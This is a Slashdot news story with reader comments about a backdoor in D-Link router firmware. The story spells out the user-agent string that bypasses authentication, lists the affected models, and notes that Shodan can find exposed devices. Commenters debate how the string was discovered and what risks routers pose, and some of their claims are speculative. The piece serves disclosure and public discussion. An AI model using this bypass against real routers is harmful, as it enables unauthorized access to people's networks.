D-Link Router Backdoor Vulnerability Allows Full Access To Settings 228
StealthHunter writes "It turned out that just by setting a browsers user-agent to 'xmlset_roodkcableoj28840ybtide' anyone can remotely bypass all authentication on D-Link routers. It seems that thttpd was modified by Alphanetworks who inserted the backdoor. Unfortunately, vulnerable routers can be easily identified by services like shodanHQ. At least these models may have vulnerable firmware: DIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240."
Re:Thank Goodness... (Score:5, Interesting)
That the consumer is always so proactive with updates that they'll upgrade their router the instant a fix is released.......NOT.
"A quick Google for the “xmlset_roodkcableoj28840ybtide” string turns up only a single Russian forum post from a few years ago, which notes that this is an “interesting line” inside the /bin/webs binary. I’d have to agree."
Even if they do, it sounds like they'll be almost four years late.
Backwards: edit by 04882 Joel backdoor (Score:5, Interesting)
And the post points out (in 2010) that if you reverse the string it was "edit by 04882 Joel Backdoor" so it was clearly a backdoor.
The big scandal here is how can a backdoor be known since 2010 and not revealed??!!!
edited by 04882 Joel backdoor (Score:4, Interesting)
Re:Will this stupidity ever end? (Score:5, Interesting)
Sometimes I think that things like this should be felonies, though. Criminal offense or not, in a sensible world this would put alphanetworks out of business.
The home router market is a an ongoing disaster (Score:5, Interesting)
There is a systemic complete and total regard for basic tenets of security in nearly the entire home router/cpe market.
Start with crypto - no hwrng and a known "less than ideal" version of /dev/random to feed your "secure" wpa and ssh sessions.
Worse:
There is no privilege separation in most routers, which was ok when they were single function devices - BUT: not ok, when vulnerability via services like samba can be used to root most of the top 10 current home routers:
http://securityevaluators.com/content/case-studies/routers/soho_service_hacks.jsp [securityevaluators.com]
Once an attacker p0wns your home gateway they can change your dns to malicious sites, as dnschanger did:
http://www.dcwg.org/ [dcwg.org]
or have it participate in botnets, or inflict further attacks on unsuspecting devices both inside and outside your firewall, or sniff your traffic - there is no security when your front door is left wide open.
What nearly every home router and cpe manufacturer is shipping is **rotware**, running 4-7 year old kernels with known CVEs, and 10 year old versions of critical services like dnsmasq. You'd think that new 802.11ac devices available for this christmas might have some modern software on it, but just to pick out a recent example - the "new" netgear nighthawk router runs Linux 2.6.36.4 and dnsmasq 2.15, according to their R7000 gpl code drop -
http://kb.netgear.com/app/answers/detail/a_id/2649 [netgear.com]
Brand new hardware - 4+ and 10 year old software respectively.
It's unfair of me to pick on Netgear, every router I've looked at this christmas season has some major issues.
Right now, the only current hope for decent security in home routers is in open, modern, and maintained firmware. And I wish the manufacturers (and ISPs, AND users, and governments) understood that, and there was (in particular) a sustainable model for continuous updates and upgrades as effective as android's in this market. I don't care if it came from taxation, isp fees, or built into the price of the device - would you willingly leave your networks' front door open if you understood the consequences?
Rotten routers with closed source code, and no maintenance, are a huge security risk, and they are holding back the ipv6 transition, (and nearly all current models have bufferbloat, besides)
How can the dysfunctional edge of the Internet be fixed?
Re:Will this stupidity ever end? (Score:4, Interesting)
Who are you going to put in prison, exactly? It's possible only a small team of engineers was aware of this. Hell, may have even just been one rogue developer who nobody gave permission to put it there.
Re:The home router market is a an ongoing disaster (Score:3, Interesting)
"Right now, the only current hope for decent security in home routers is in open, modern, and maintained firmware"
Nah. The only lonely hope fer descentified home security routers is to build sum yerself. It aren't that hard. What hillbilly don't got a beige box layin' about and a spare NIC? Need juz... uh... count 'em: | | <- Dis manny Etherport whatsits to build a maximam security gateway. I tighted two screws (righty tighty, leftie loosie), got dem dere PCI card hooked up. Putted in a CD, wot axed a few questimations, and done.
Oh, but dis is dat dere big brained slashamadoodle folks. Fergiven ma pardon. Ain tryin' ta make yah look dum 'er nuffin. Ya'll cityfolks done figgered dis shit aout. [wikipedia.org]
Juz liek ta bitch an' moan is all, eh?
's like gramppy says: Yah can lead a geek ta a solution, butcha go ta jail if ya drown 'em in it.
Re:A big problem (Score:5, Interesting)
Being able to manipulate the router's config interface would allow an external entity the ability to upload a new firmware to the router. The new firmware would offer the attacker switches to flip at will that would enable packet sniffing of all traffic and man-in-the-middle SSL attacks. Organized crime / NSA (redundant to mention both, I know) seek no deeper capabilities than this.
You bring up a great point of smaller establishments running WiFi on D-Link equipment. Perhaps their SSID's should be modified to read, "HACKED BY NSA - DO NOT USE!"
Re:Will this stupidity ever end? (Score:4, Interesting)
I also have my own site and I see many things. I know that every day there are people knocking on doors or ports. It is another world that most people only understand as some kind of stuff done by technically afflicted people.
Re:Will this stupidity ever end? (Score:5, Interesting)
Re:Will this stupidity ever end? (Score:5, Interesting)
The DI-524 is, what, 8 years old? The firmware for it hasn't been updated since 2006. How, then is it listed as vulnerable?
This is some guy on a blog. It's a mixture of fact and wild speculation. This isn't an official security notification on something like Bugtraq or CERT, etc. He tested the DI-100 firmware, v1.13. The FTP link he provided lists the timestamp for the file as "02/19/2013 11:09AM", not 2006.
He doesn't even have a DI-100, he just downloaded it at random. He thinks, based on "the source code of the HTML pages and some Shodan search results", that the devices listed are affected. There was no actual testing, it's just rampant speculation based on Sir Bloggy McBlogs google-fu. Now, that said, I have been doing some additional research and the company Revell is based out of Germany -- which is also where D-Link's software development team is. Revell's website indicates the model went on sale about the same time as the movie release -- May 2013. The timestamp is February. It's not enough to bust my theory that 04882 is a reference to the model... it's just possible the website is wrong, or he got one early from a friend who works at said company. It does happen; Maybe they handed them out at special screenings.
Such is the nature of speculating on these things; it's interesting, but it's nearly impossible to get positive verification of a theory.
Re:Idiot pruf (Score:5, Interesting)
I can easily see something like this having the potential to cause losses not dissimilar to your "shuttle crash" scenario. It's "keys to the kingdom" external access to what should be a private network.
Finally, there's no chance in hell of even 1% of these devices receiving a firmware update. Nobody (outside of us) upgrades the firmware on their home router; They run it from factory until death, then buy another one. These devices will be vulnerable for the foreseeable future.
Re:Will this stupidity ever end? (Score:5, Interesting)
It sounds more like the backdoor was put in deliberately, probably to aid support staff who were fed of up trying to explain how to type "192.168.1.1" into the address box instead of Bing. This way they can just find your IP address and then go in via the backdoor to sort any problems out, about 90% of which will be wifi congestion on the default channel (11).
Re:Why bother? (Score:0, Interesting)
I wouldn't really say forked as much as I would say "given a new lick of paint".
Admittedly they added features on top that completely change the way you can interact with Android, which I prefer massively.
I mean, who DOESN'T want Multi-tasking capabilities? Right now general Android is a toy OS at best, not even kidding (same with all the other crappy phone OSes like it), it is awful, multi-tasking actually makes it useful beyond playing some crap games or browsing Faceboke.
Then there is the S Pen, admittedly the model I have has a weird detection error on the middle left side and somewhere around 25% down on the right side, but those are minor, but god damn, S Pen is so incredibly useful.
Around 65-70% of the reason I even got the Samsung tablet was due to multi-tasking and the S Pen so I could use it as a graphics tablet as well.
I can just sit there with VNC open as well as S Note in dual view working between them easily.
I've even been thinking of writing an S Pen based keyboard, specifically for it because I haven't found a single decent keyboard besides that Hackers Keyboard, everything else is absolute trash for any reasonable use in anything text-heavy that, yet again, isn't stupid Facebook tards posting terrible updates about how they suck at everything. Gotta put smileys in my keyboard for all the fb ppls XD. FUCK.
But yes, I actually dislike the general Android community for lashing against Samsung for trying to actually, you know, MAKE THINGS EASIER AND BETTER.
I hope eventually they get some good code behind the window manager that can force any application in to a window and deal with the interaction issues externally so applications themselves don't need to add any support to it directly, that would be great, then it truly has become just a facelift rather than an attempt to force others in to using Samsung specific interfaces. (any good developer would only add support for it and not just support it solely anyway)
Re:Idiot pruf (Score:4, Interesting)
I think it is? http://tsd.dlink.com.tw/downloads2008detailgo.asp [dlink.com.tw]
Someone commented on another website with this link: https://gist.github.com/ccpz/6960941 [github.com] which shows
the backdoor string being defined in some config.